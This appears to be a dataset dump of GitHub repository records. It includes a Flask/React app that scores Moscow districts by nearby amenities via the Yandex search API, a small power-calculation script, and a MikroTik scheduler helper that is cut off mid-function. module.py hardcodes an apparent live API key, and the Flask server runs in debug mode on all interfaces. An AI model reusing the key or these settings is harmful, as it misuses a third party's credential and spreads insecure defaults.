'ABC':\n print(ch)\n\nprint('--------------------------------------')\n\nfrom collections import Iterable\n\nprint(isinstance('abc', Iterable))\nprint(isinstance('[1,2,3,4]', Iterable))\nprint(isinstance(212312313, Iterable))\n\nprint('-----------------\\r\\n')\nfor i, value in enumerate(['A', 'B', 'C']):\n print(i + 1, value)\nprint('-----------------\\r\\n')\nfor x, y in [(1, 1), (2, 4), (3, 9)]:\n print(x, y)\n" } ]
28
br1tv4/vozvedenie-v-stepen
https://github.com/br1tv4/vozvedenie-v-stepen
c2f452727f673551bfbbc771e65c180db37e35f5
fec09854e652c6fc175be8dfed71cb77c376536f
d4e742404036f2a1e24b27ce3d61bcf451e532e1
refs/heads/main
2023-08-18T18:25:50.504757
2021-10-06T07:21:34
2021-10-06T07:21:34
414,109,522
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5157232880592346, "alphanum_fraction": 0.5220125913619995, "avg_line_length": 13.899999618530273, "blob_id": "13e3086d464c7c3cbb8d4b9c2a082e08ba2476ec", "content_id": "7b21836ee4d4ac841060b3aa6b03517ebf47eac7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 159, "license_type": "no_license", "max_line_length": 26, "num_lines": 10, "path": "/stepen-chisla.py", "repo_name": "br1tv4/vozvedenie-v-stepen", "src_encoding": "UTF-8", "text": "x = input(\"Input number \")\r\nn = input(\"Input degree \")\r\n\r\nx = int(x)\r\nn = int(n)\r\n\r\nresult = 1\r\nfor i in range (n):\r\n result *=x\r\nprint('x**n ==', result)\r\n" } ]
1
dimalemur/map
https://github.com/dimalemur/map
16e43739bdc9ce2c5518d92898971b32f987ad9d
eb95dac73c66ce68db68aaf30e7281a81daafc06
9faca907c95349a1f836020141586a03c8747f5a
refs/heads/master
2022-12-29T15:42:24.244673
2020-02-29T18:33:40
2020-02-29T18:33:40
225,604,917
0
0
null
2019-12-03T11:36:17
2020-02-29T18:33:56
2022-12-11T15:48:11
Python
[ { "alpha_fraction": 0.36116504669189453, "alphanum_fraction": 0.3786407709121704, "avg_line_length": 37.625, "blob_id": "f886c3baa7456a7660c7fcbe4fcab60545e3fb51", "content_id": "f33bb37977dbf59a57482f625c6ab7975a4d05c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1545, "license_type": "no_license", "max_line_length": 120, "num_lines": 40, "path": "/src/server/app/main.py", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "from module import *\nfrom analiz import for_life_2, for_sport, for_fun\nimport json\n\n\ndef for_api(mode):\n result = {\"type\": \"FeatureCollection\", \"features\": []}\n\n index = 0\n\n if mode == \"for_life\":\n md = for_life_2()\n if mode == \"for_sport\":\n md = for_sport()\n if mode == \"for_fun\":\n md = for_fun()\n\n for i in md:\n if i[\"color\"] != 0:\n result[\"features\"].append({\"type\": \"Feature\", \"id\": index, \"geometry\": {\"type\": \"Polygon\", \"coordinates\": [[\n [i[\"coordinates\"][0] - long / 2, i[\"coordinates\"][1] - width / 2],\n [i[\"coordinates\"][0] - long / 2, i[\"coordinates\"][1] + width / 2],\n [i[\"coordinates\"][0] + long / 2, i[\"coordinates\"][1] + width / 2],\n [i[\"coordinates\"][0] + long / 2, i[\"coordinates\"][1] - width / 2]\n ]\n ]\n },\n \"properties\": {\"fill\": i[\"color\"],\n \"fill-opacity\": 0.85,\n \"stroke\": i[\"color\"],\n \"stroke-width\": \"1\",\n \"stroke-opacity\": 0.9\n }})\n index += 1\n return result\n\n\ndef for_geo_json():\n with open(\"../Sample_GEOJSON.geojson\", \"w\") as write_file:\n json.dump(for_api(), write_file)\n" }, { "alpha_fraction": 0.6772486567497253, "alphanum_fraction": 0.7089946866035461, "avg_line_length": 14.833333015441895, "blob_id": "ec0ff68092eb1ed4a693f3a3a3c97cfd6bccabcb", "content_id": "299ffe49e6c717e7dc1cd41eb44f2ae0963cd2e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 189, "license_type": "no_license", "max_line_length": 40, "num_lines": 12, "path": "/Dockerfile", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "FROM python:3.7\n\nRUN mkdir -p /usr/src/app/\nWORKDIR /usr/src/app/\n\nCOPY . 
/usr/src/app/\nRUN pip install requests\nRUN pip install flask\n\nEXPOSE 5000\n\nCMD [\"python\" , \"src/server/app/app.py\"]" }, { "alpha_fraction": 0.5391804575920105, "alphanum_fraction": 0.5542774796485901, "avg_line_length": 21.079364776611328, "blob_id": "d85983a255b85925d6c57a4a5856ae5ccf03eea6", "content_id": "d7dada8e877601c3426f7f8ca44f5f129a18765b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1391, "license_type": "no_license", "max_line_length": 108, "num_lines": 63, "path": "/src/server/app/db.py", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import sqlite3\nimport sys\nimport os.path\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\ndb_path = os.path.join(BASE_DIR, \"bd.db\")\nprint(BASE_DIR)\nprint(db_path)\n\n\ndef tags(id):\n con = sqlite3.connect(db_path)\n cur = con.cursor()\n tags = []\n cur.execute('select * from tags')\n for j in cur.fetchall():\n if j[0] == id:\n tags.append({\"color\": j[1], \"text\": j[2]})\n return tags\n\n\ndef points(id):\n con = sqlite3.connect(db_path)\n cur = con.cursor()\n cur.execute('select * from points')\n for j in cur.fetchall():\n if j[0] == id:\n return j[1]\n\n\ndef initState():\n links = []\n con = sqlite3.connect(db_path)\n cur = con.cursor()\n\n state = []\n\n cur.execute('select * from options')\n for i in cur.fetchall():\n state.append({\"buttonName\": i[1], \"buttonStatus\": i[2], \"tags\": tags(i[0]), \"points\": points(i[0])})\n con.close()\n return state\n\n\ndef initState_api(mode):\n links = []\n con = sqlite3.connect(db_path)\n cur = con.cursor()\n\n state = []\n if mode == \"for_life\":\n md = 0\n if mode == \"for_fun\":\n md = 1\n if mode == \"for_sport\":\n md = 2\n\n cur.execute('select * from options')\n\n for i in cur.fetchall():\n state.append({\"buttonName\": i[1], \"buttonStatus\": i[2], \"tags\": tags(i[0]), \"points\": points(i[0])})\n con.close()\n return state[md]\n" }, { "alpha_fraction": 0.7858880758285522, "alphanum_fraction": 0.7858880758285522, "avg_line_length": 33.08333206176758, "blob_id": "61057ce2895437ce3ce780f85433b2cad9e01332", "content_id": "39ccdc24a04ed9d009ff81c23fdf2578568c29a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 411, "license_type": "no_license", "max_line_length": 85, "num_lines": 12, "path": "/src/client/store/store.js", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport {combineReducers, createStore,applyMiddleware} from \"redux\";\nimport {mainPageReducer} from \"./reducers/mainPageReducer.js\";\nimport thunk from \"redux-thunk\";\nimport {composeWithDevTools} from \"redux-devtools-extension\";\n\nlet reducers = combineReducers({\n MainPage: mainPageReducer\n});\n\n\nexport let store = createStore(reducers,composeWithDevTools(applyMiddleware(thunk)));\n\n\n" }, { "alpha_fraction": 0.5949820876121521, "alphanum_fraction": 0.6075268983840942, "avg_line_length": 22.29166603088379, "blob_id": "95adc4bbc12947a5d00e5414182e75fd08a9a01e", "content_id": "287b1daa2c6ab475b48a55264d6eea8f56bf18a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 558, "license_type": "no_license", "max_line_length": 71, "num_lines": 24, "path": "/src/client/components/mapFrame/index.jsx", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport \"./mapFrame.css\"\nimport {connect} from 
\"react-redux\";\nimport {Map, ObjectManager, Placemark, YMaps} from \"react-yandex-maps\";\n\n\nconst MapFrame = (props) => {\n return (\n <div className=\"MapFrame Content\" id=\"maps\">\n <iframe\n src={props.options[props.active].points}\n width=\"100%\" height=\"100%\" frameBorder=\"0\"/>\n </div>\n )\n};\n\n\nexport default connect(\n state => ({\n options: state.MainPage.options,\n active: state.MainPage.active\n }),\n dispatch => ({})\n)(MapFrame);" }, { "alpha_fraction": 0.5767045617103577, "alphanum_fraction": 0.5795454382896423, "avg_line_length": 23.275861740112305, "blob_id": "b509f23753dec67330d92626b4178e29aa3d5f42", "content_id": "1f151c29a5684510f440780596cd84d60797d720", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 704, "license_type": "no_license", "max_line_length": 69, "num_lines": 29, "path": "/src/client/pages/main/index.jsx", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport {Header} from \"../../components/header\";\nimport OptionSelection from \"../../components/optionSelection\";\nimport {AsideWhiteBlock} from \"../../components/asideWhiteBlock\";\nimport {connect} from \"react-redux\";\nimport Places from \"../../components/places\";\n\n\nconst Main = (props) => {\n return (\n <div className=\"Main\">\n <Header/>\n <AsideWhiteBlock text = {props.state.MainPage.text[0]} />\n <AsideWhiteBlock text = {props.state.MainPage.text[1]}/>\n <OptionSelection />\n <Places/>\n </div>\n )\n};\n\n\nexport default connect(\n state =>({\n state:state\n }),\n dispatch => ({\n\n })\n)(Main);\n" }, { "alpha_fraction": 0.5748351216316223, "alphanum_fraction": 0.5854895710945129, "avg_line_length": 27.157142639160156, "blob_id": "0d6d88f223d2b5ad4a7946cbb36062177055f71f", "content_id": "49128fdf88ad9fac8bea4521eee27f7a35121639", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1971, "license_type": "no_license", "max_line_length": 118, "num_lines": 70, "path": "/src/server/app/app.py", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template\nfrom flask import request\nimport os\nfrom db import initState, initState_api\nfrom main import *\n\napp = Flask(__name__, static_folder=\"../../../public/\")\n\n\[email protected]('/')\ndef main():\n return render_template('index.html')\n\n\[email protected]('/ololo', methods=['GET', 'POST'])\ndef get_point():\n if request.method == 'POST':\n req_data = json.loads(request.data.decode(\"utf-8\"))\n print(req_data)\n res = json.dumps(for_life())\n print(res)\n return res\n else:\n return {\"lol\": \"1\"}\n\n\[email protected]('/initPlaces', methods=['GET', 'POST'])\ndef init_places():\n if request.method == 'POST':\n res = []\n req_data = json.loads(request.data.decode(\"utf-8\"))\n print(req_data)\n response = json.loads(requests.get(\"https://kudago.com/public-api/v1.2/places/?location=msk\").text)[\"results\"]\n for i in response:\n res.append({\"title\": i[\"title\"], \"telNumber\": i[\"phone\"], \"address\": i[\"address\"], \"link\": i[\"site_url\"]})\n return json.dumps(res)\n else:\n return {\"1\": \"1\"}\n\n\[email protected]('/init', methods=['GET', 'POST'])\ndef init_options():\n if request.method == 'POST':\n req_data = json.loads(request.data.decode(\"utf-8\"))\n print(req_data)\n res = json.dumps(initState())\n print(initState())\n return res\n else:\n return {\"1\": \"1\"}\n\n\[email 
protected]('/api/city=<city>&mode=<mode>', methods=['GET'])\ndef get_task(city, mode):\n if city != \"msk\":\n return render_template(\"404.html\", err=city)\n res = for_api(mode)\n return str(json.dumps(res))\n\n\[email protected]('/api/frame/city=<city>&mode=<mode>', methods=['GET'])\ndef get_init_state_api(city, mode):\n if city != \"msk\":\n return render_template(\"404.html\", err=city)\n res = initState_api(mode)\n return str(json.dumps(res)).encode('utf-8').decode('unicode-escape')\n\n\nif __name__ == '__main__':\n app.run(debug=True, host=\"0.0.0.0\")\n" }, { "alpha_fraction": 0.48640915751457214, "alphanum_fraction": 0.4892703890800476, "avg_line_length": 29.30434799194336, "blob_id": "bcc29cfbcecd5dea778dfa18ce5d3e84b36fb41f", "content_id": "7ca84c8ad06d7e25d00a6e767a3a328ff04b7557", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 699, "license_type": "no_license", "max_line_length": 55, "num_lines": 23, "path": "/src/client/store/reducers/Points.js", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import {addPoints} from \"../reducers/mainPageReducer\"\nimport {selectActive} from \"./mainPageReducer\";\n\nexport const asyncGetPoints = (index) => dispatch => {\n fetch('/ololo', {\n method: 'POST',\n body: JSON.stringify({val: index}),\n })\n .then((response) => response.json())\n .then((data) => {\n let result = data.map((point) => {\n return {\n latitude: point[\"coordinates\"][1],\n longitude: point[\"coordinates\"][0],\n color: point[\"color\"]\n }\n });\n\n dispatch(addPoints(result,index));\n\n })\n .catch((error) => console.error(error));\n};\n\n\n" }, { "alpha_fraction": 0.5004677176475525, "alphanum_fraction": 0.5014031529426575, "avg_line_length": 24.4761905670166, "blob_id": "e95c7d4d561af1bf07c5522ed080e82a423c8b8b", "content_id": "9b1731880676efab5dcaa29d7cf171bdcb308994", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1069, "license_type": "no_license", "max_line_length": 87, "num_lines": 42, "path": "/src/client/components/selectDistrict/index.jsx", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React, {useState} from 'react';\nimport \"./selectDistrict.css\"\nimport {InfoForDistrict} from \"../infoForDistrict\";\nimport {connect} from \"react-redux\";\n\n\nconst SelectDistrict = (props) => {\n\n const [active, setActive] = useState(0);\n\n const changeDistrict = (event) => {\n setActive(event.target.value);\n };\n\n return (\n <div className=\"SelectDistrict Content\">\n <select className=\"SelectDistrict-Select Select\" onChange={changeDistrict}>\n {\n props.districts.map((dst, i) => {\n return (\n <option className=\"SelectDistrict-Item\" key={i} value={i}>\n {dst.dist}\n </option>\n )\n })\n }\n </select>\n\n <InfoForDistrict districts={props.districts[active]}/>\n\n\n </div>\n )\n};\n\n\nexport default connect(\n state => ({\n districts: state.MainPage.districts\n }),\n dispatch => ({})\n)(SelectDistrict);" }, { "alpha_fraction": 0.4726298749446869, "alphanum_fraction": 0.5108315944671631, "avg_line_length": 35.38135528564453, "blob_id": "6d9f31bc3fceb3fc4e552b907bd06ffae504afaa", "content_id": "e72b6f28f88cf94fdd4bda3af3d186af2fde737e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4518, "license_type": "no_license", "max_line_length": 108, "num_lines": 118, "path": "/src/server/app/analiz.py", "repo_name": "dimalemur/map", "src_encoding": 
"UTF-8", "text": "from module import *\n\ncheck = []\npoints = map_point()\n\n\ndef calc_sum_2(points, text, good):\n search_points = fetch(text)\n for sP in search_points:\n for point in points:\n if point[\"coordinates\"][1] - long < sP[\"coordinates\"][1] < point[\"coordinates\"][1] + long:\n if point[\"coordinates\"][0] - width < sP[\"coordinates\"][0] < point[\"coordinates\"][0] + width:\n if sP[\"coordinates\"] not in check:\n check.append(sP[\"coordinates\"])\n if point[\"sum\"] != \"good\" and point[\"sum\"] < good:\n point[\"sum\"] += 1\n if point[\"sum\"] == \"good\" or point[\"sum\"] >= good:\n point[\"sum\"] = \"good\"\n return points\n\n\ndef for_life_2():\n points = map_point()\n points = calc_sum_2(points, \"Продуктовый магазин\", 4)\n points = calc_sum_2(points, \"Школа\", 1)\n points = calc_sum_2(points, \"Детский сад\", 1)\n points = calc_sum_2(points, \"Аптека\", 3)\n points = calc_sum_2(points, \"Парикмахерская\", 2)\n points = calc_sum_2(points, \"ТЦ\", 1)\n points = calc_sum_2(points, \"Поликлиника\", 2)\n points = calc_sum_2(points, \"ветеринарная клиника\", 1)\n points = calc_sum_2(points, \"Фитнес клуб\", 1)\n points = calc_sum_2(points, \"Почта\", 1)\n\n points_2 = map_point()\n points_2 = calc_sum_2(points_2, \"Бар\", 1)\n points_2 = calc_sum_2(points_2, \"кафе\", 1)\n points_2 = calc_sum_2(points_2, \"кинотеатр\", 1)\n points_2 = calc_sum_2(points_2, \"метро\", 2)\n\n for point in points:\n if point[\"sum\"] == \"good\":\n point[\"color\"] = \"#eeff00\"\n elif point[\"sum\"] != \"good\" and point[\"sum\"] != 0:\n point[\"color\"] = \"#c4c4c4\"\n else:\n point[\"color\"] = 0\n for point_2 in points_2:\n if point[\"coordinates\"] == point_2[\"coordinates\"]:\n if point_2[\"sum\"] == \"good\" and point[\"sum\"] == \"good\":\n point[\"color\"] = \"#ed8e09\"\n return points\n\n\ndef for_sport():\n points = map_point()\n points = calc_sum_2(points, \"Спортивная площадка\", 2)\n points = calc_sum_2(points, \"Фитнес Центр\", 1)\n points = calc_sum_2(points, \"Спортивный зал\", 1)\n\n points_2 = map_point()\n points_2 = calc_sum_2(points_2, \"Велодорожка\", 1)\n points_2 = calc_sum_2(points_2, \"Парк\", 1)\n\n for point in points:\n if point[\"sum\"] == \"good\":\n point[\"color\"] = \"#BF9DC5\"\n elif point[\"sum\"] != \"good\" and point[\"sum\"] != 0:\n point[\"color\"] = \"#c4c4c4\"\n else:\n point[\"color\"] = 0\n for point_2 in points_2:\n if point[\"coordinates\"] == point_2[\"coordinates\"]:\n if point_2[\"sum\"] == \"good\" and point[\"sum\"] == \"good\":\n point[\"color\"] = \"#7ABD9B\"\n return points\n\n\ndef for_fun():\n points = map_point()\n points = calc_sum_2(points, \"ночной клуб\", 1)\n points = calc_sum_2(points, \"Бар\", 2)\n points = calc_sum_2(points, \"кинотеатр\", 1)\n points = calc_sum_2(points, \"Кафе\", 3)\n points = calc_sum_2(points, \"бильярд\", 1)\n points = calc_sum_2(points, \"боулинг\", 1)\n points = calc_sum_2(points, \"квеструм\", 1)\n\n\n points_2 = map_point()\n points_2 = calc_sum_2(points_2, \"Театр\", 1)\n points_2 = calc_sum_2(points_2, \"Музей\", 1)\n\n for point_2 in points_2:\n if point_2[\"sum\"] == \"good\":\n point_2[\"color\"] = \"#FF3C1E\"\n elif point_2[\"sum\"] != \"good\" and point_2[\"sum\"] != 0:\n point_2[\"color\"] = \"#c4c4c4\"\n else:\n point_2[\"color\"] = 0\n\n for point in points:\n if point[\"sum\"] == \"good\":\n point[\"color\"] = \"#4574B2\"\n elif point[\"sum\"] != \"good\" and point[\"sum\"] != 0:\n point[\"color\"] = \"#c4c4c4\"\n else:\n point[\"color\"] = 0\n for point_2 in points_2:\n if 
point[\"coordinates\"] == point_2[\"coordinates\"]:\n if point_2[\"sum\"] == \"good\" and point[\"sum\"] == \"good\":\n point[\"color\"] = \"#BF9DC5\"\n if point_2[\"color\"] == \"#FF3C1E\" and point[\"color\"] == \"#c4c4c4\":\n point[\"color\"] = \"#FF3C1E\"\n if point_2[\"color\"] == \"#c4c4c4\" and point[\"color\"] == \"#4574B2\":\n point[\"color\"] = \"#4574B2\"\n\n return points\n" }, { "alpha_fraction": 0.32594937086105347, "alphanum_fraction": 0.32594937086105347, "avg_line_length": 26.521739959716797, "blob_id": "735d62092b8dcb158d2873285a94ea2ab77ba031", "content_id": "ab96f669c5cf2cf898516937fad3a42eed78e683", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 632, "license_type": "no_license", "max_line_length": 91, "num_lines": 23, "path": "/src/client/components/tags/index.jsx", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport \"./tags.css\"\n\n\nexport const Tags = (props) => {\n return (\n <div className=\"Tags\">\n\n {props.tags.map((tag,i) => {\n return (\n <div className=\"Item Tags-Item\" key={i}>\n <div className=\"Item-Lst\" style={{background: `${tag.color}`}}>\n </div>\n <div className=\"Item-Text\">\n {tag.text}\n </div>\n </div>\n )\n }\n )}\n </div>\n )\n};" }, { "alpha_fraction": 0.4517543911933899, "alphanum_fraction": 0.4517543911933899, "avg_line_length": 24.33333396911621, "blob_id": "f9d82320d40cfa2520dd6e4e6c22c1be81bcc698", "content_id": "4db9176797f3a92385b19cebe58f69141e808e97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1140, "license_type": "no_license", "max_line_length": 89, "num_lines": 45, "path": "/src/client/components/optionSelection/index.jsx", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport \"./optionSection.css\"\nimport MapFrame from \"../mapFrame\";\nimport {Tags} from \"../tags\";\nimport {connect} from \"react-redux\";\nimport Button from \"../button\"\n\nconst OptionSelection = (props) => {\n\n return (\n <div className=\"OptionSelection Content\">\n <ul className=\"OptionSelection-NavBar NavBar\">\n {\n props.state.MainPage.options.map((btn, index) => {\n return (\n <Button\n key={index}\n index={index}\n btn={btn.buttonName}\n />\n )\n })\n }\n </ul>\n\n\n <Tags tags={props.state.MainPage.options[props.state.MainPage.active].tags}/>\n\n <div className=\"OptionSelection-Map\">\n <MapFrame active = {props.state.MainPage.active} />\n </div>\n\n\n </div>\n )\n};\n\nexport default connect(\n state =>({\n state:state\n }),\n dispatch => ({\n\n })\n)(OptionSelection);\n" }, { "alpha_fraction": 0.4865073263645172, "alphanum_fraction": 0.4911333918571472, "avg_line_length": 25.97916603088379, "blob_id": "e21634595ec88028e17962046667383bca53cff3", "content_id": "0210015cfb4f218585a34351e7e935a8d9d466e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1490, "license_type": "no_license", "max_line_length": 155, "num_lines": 48, "path": "/src/client/store/initialState.jsx", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport {addPoints, selectActive} from \"./reducers/mainPageReducer\";\n\n// fetch('/data', {\n// method: 'POST',\n// body: JSON.stringify({val: index}),\n// })\n// .then((response) => response.json())\n// .then((data) => {\n// console.log(data);\n// let result = data.map((point) => {\n// return {\n// 
latitude: point[\"coordinates\"][1],\n// longitude: point[\"coordinates\"][0],\n// color: point[\"color\"]\n// }\n// });\n//\n// dispatch(addPoints(result, index));\n// dispatch(selectActive(index));\n//\n// })\n// .catch((error) => console.error(error));\n\nexport const initialState = {\n active: 0,\n text: [\n \"Москва - огромный город для жизни и для развлечений. Только подумать, 12.5 миллионов совершенно разных людей, чьи вкусы и потребности уникальны.\",\n \"Опираясь на отзывы людей из социальных сетей можно разделить районы города на три категории:\"\n ],\n options: [\n {\n buttonName: \"\",\n buttonStatus: \"\",\n tags:[],\n points:[]\n }\n ],\n\n places: [\n {\n title:\"\",\n telNumber:\"\",\n address:\"\",\n link:\"\"\n }\n ]\n};\n\n\n" }, { "alpha_fraction": 0.5512820482254028, "alphanum_fraction": 0.5512820482254028, "avg_line_length": 22.923076629638672, "blob_id": "b2a68a5629d8909dd33f4d16ab0cade5feb75cc3", "content_id": "02174f94775082726d29023ca277e04496d7fc6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 312, "license_type": "no_license", "max_line_length": 59, "num_lines": 13, "path": "/src/client/components/asideWhiteBlock/index.jsx", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport \"./aside.css\"\n\n\nexport const AsideWhiteBlock = (props) => {\n return (\n <div className=\"AsideWhiteBlock Content\">\n <div className=\"AsideWhiteBlock-Text\">\n <span className= \"Text\">{props.text}</span>\n </div>\n </div>\n )\n};\n\n" }, { "alpha_fraction": 0.4369436204433441, "alphanum_fraction": 0.5229970216751099, "avg_line_length": 29.659090042114258, "blob_id": "5183f6935339cb2edb96b93393e6bf7c63036318", "content_id": "26264d8b8dae467683585693cf58bf0d51a67408", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1348, "license_type": "no_license", "max_line_length": 151, "num_lines": 44, "path": "/src/server/app/module.py", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import requests\nimport json\n\nKEY = \"a84c0a4b-affd-4b46-b010-e1cca5038a86\"\n\nLATITUDE_1 = \"55.92095016773269\"\nLONGITUDE_1 = \"37.94117188864121\"\nLATITUDE_2 = \"55.56626737889634\"\nLONGITUDE_2 = \"37.29587767003522\"\n\nwidth = abs((float(LATITUDE_2) - float(LATITUDE_1)) / 40)\nlong = abs((float(LONGITUDE_2) - float(LONGITUDE_1)) / 40)\n\nres = width * long\n\n\ndef map_point():\n num = 1\n a = float(LATITUDE_2)\n b = float(LONGITUDE_2)\n mass = []\n for w in range(40):\n a += width\n b = float(LONGITUDE_2)\n for h in range(40):\n num += 1\n b += long\n mass.append({\"coordinates\": [b, a], \"sum\": 0, \"color\": \"\"})\n return mass\n\n\ndef fetch(SEARCHING_TEXT):\n map = []\n response = requests.get(\n \"https://search-maps.yandex.ru/v1/?text=\" + SEARCHING_TEXT + \"&type=biz\"\n \"&lang=ru_RU\"\n \"&bbox=\" + LONGITUDE_1 + \",\" + LATITUDE_1 + \"~\" + LONGITUDE_2 + \",\" + LATITUDE_2 +\n \"&results=100000&apikey=\" + KEY)\n\n for i in json.loads(response.content.decode('utf-8'))[\"features\"]:\n map.append({\"coordinates\": i[\"geometry\"][\"coordinates\"],\n \"name\": i[\"properties\"][\"CompanyMetaData\"][\"Categories\"][0][\"name\"]})\n\n return map" }, { "alpha_fraction": 0.6068376302719116, "alphanum_fraction": 0.6136752367019653, "avg_line_length": 22.399999618530273, "blob_id": "3b21f141598da38ca4ddcb1bf85bd82d01b462c7", "content_id": "6136261a01f077c401b972cadf21f3fd134e3bcb", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 585, "license_type": "no_license", "max_line_length": 105, "num_lines": 25, "path": "/src/client/components/textContent/index.jsx", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport \"./textContent.css\";\nimport {AsideGrayBlock} from \"../AsideGrayBlock\";\nimport {connect} from \"react-redux\";\n\n\nconst TextContent = (props) => {\n return (\n <div className=\"Content TextContent\">\n <AsideGrayBlock title={props.state.MainPage.title[1]} text = {props.state.MainPage.text[1]}/>\n <AsideGrayBlock title={props.state.MainPage.title[2]} text = {props.state.MainPage.text[2]}/>\n </div>\n )\n};\n\n\n\nexport default connect(\n state =>({\n state:state\n }),\n dispatch => ({\n\n })\n)(TextContent);\n" }, { "alpha_fraction": 0.525896430015564, "alphanum_fraction": 0.5285524725914001, "avg_line_length": 26.925926208496094, "blob_id": "eed5aa52c6911eefae6bcb48399ca96f8cfb200e", "content_id": "5eb620617fe15b28eccdf2f66e0260a347882022", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 753, "license_type": "no_license", "max_line_length": 70, "num_lines": 27, "path": "/src/client/store/reducers/SetInitState.js", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import {setInitialOptions, setInitialPlaces} from \"./mainPageReducer\";\n\nexport const setInitOptions = () => dispatch => {\n fetch('/init', {\n method: 'POST',\n body: JSON.stringify({val: 1}),\n })\n .then((response) => response.json())\n .then((data) => {\n dispatch(setInitialOptions(data));\n })\n .catch((error) => console.error(error));\n};\n\n\nexport const setInitPlaces = () => dispatch => {\n fetch('/initPlaces', {\n method: 'POST',\n body: JSON.stringify({val: 1}),\n })\n .then((response) => response.json())\n .then((data) => {\n dispatch(setInitialPlaces(data));\n console.log(data)\n })\n .catch((error) => console.error(error));\n};" }, { "alpha_fraction": 0.5147313475608826, "alphanum_fraction": 0.5181975960731506, "avg_line_length": 35.125, "blob_id": "886a7f82796c67445c77f395f13e427e0841293c", "content_id": "57d1d6fcac247f5b23d5595ca7bbb24eb849dff2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 587, "license_type": "no_license", "max_line_length": 103, "num_lines": 16, "path": "/src/client/components/header/index.jsx", "repo_name": "dimalemur/map", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport \"./header.css\";\n\nexport const Header = (props) => {\n return (\n <div className=\"Header Content Content_green\">\n <div className=\"Header-Inner\">\n <h3 className=\"Header-Title\">Info MSK</h3>\n <div className=\"Header-Nav Nav\">\n <div className=\"Nav-Map Map\"><a href=\"#maps\" className = \"Map-Link\">Карты</a></div>\n <div className=\"Nav-Rating\"><a href=\"#Events\" className=\"Nav-Link\">Места</a></div>\n </div>\n </div>\n </div>\n )\n};" } ]
18
evgeniy-p/study
https://github.com/evgeniy-p/study
5f386f8a6530aa23890c490648dfee6febe9fab5
20aa30efbdfbeb88a29d4ab15282cb6a51a60459
e0d528147eab3ab83e836887cb1b8a223d1b9e8f
refs/heads/master
2020-12-03T00:44:37.291064
2019-10-14T11:40:36
2019-10-14T11:40:36
96,076,928
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.4789029657840729, "alphanum_fraction": 0.5042194128036499, "avg_line_length": 45.47058868408203, "blob_id": "4039971fc179fcf14f0641841ee8ac0e4441f294", "content_id": "1de0a38d9e2be101bda51b903e31a1419c3f38ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2370, "license_type": "no_license", "max_line_length": 116, "num_lines": 51, "path": "/scheduler.py", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "import same\nimport logging\nfrom re import match\n\nmonts = {'01': 'Jan', '02': 'Feb', '03': 'Mar', '04': 'Apr', '05': 'May', '06': 'Jun', '07': 'Jul', '08': 'Aug',\n '09': 'Sep', '10': 'Oct', '11': 'Nov', '12': 'Dec'}\n\nmonts_rev = {'jan': '01', 'feb': '02', 'mar': '03', 'apr': '04', 'may': '05', 'jun': '06', 'jul': '07', 'aug': '08',\n 'sep': '09', 'oct': '10', 'nov': '11', 'dec': '12'}\n\n\ndef make_day(input_date):\n day = monts[input_date.split('*')[0]] + '/' + input_date.split('*')[1]\n return day\n\n\nclass Scheduler(same.Same):\n def __init__(self, router):\n super().__init__(router)\n\n def make_sched(self, host, date, interv, method):\n self.make('/system/scheduler/add', '=name={}_'.format(method) + host,\n '=start-date=' + make_day(date), '=start-time=' + date.split('*')[2],\n '=interval=' + interv, '=on-event={}_'.format(method) + host, '=disabled=yes')\n\n def remove_shed(self, host, method):\n shed_id = self.make('/system/scheduler/print', '?name={}_'.format(method) + host)\n if shed_id:\n 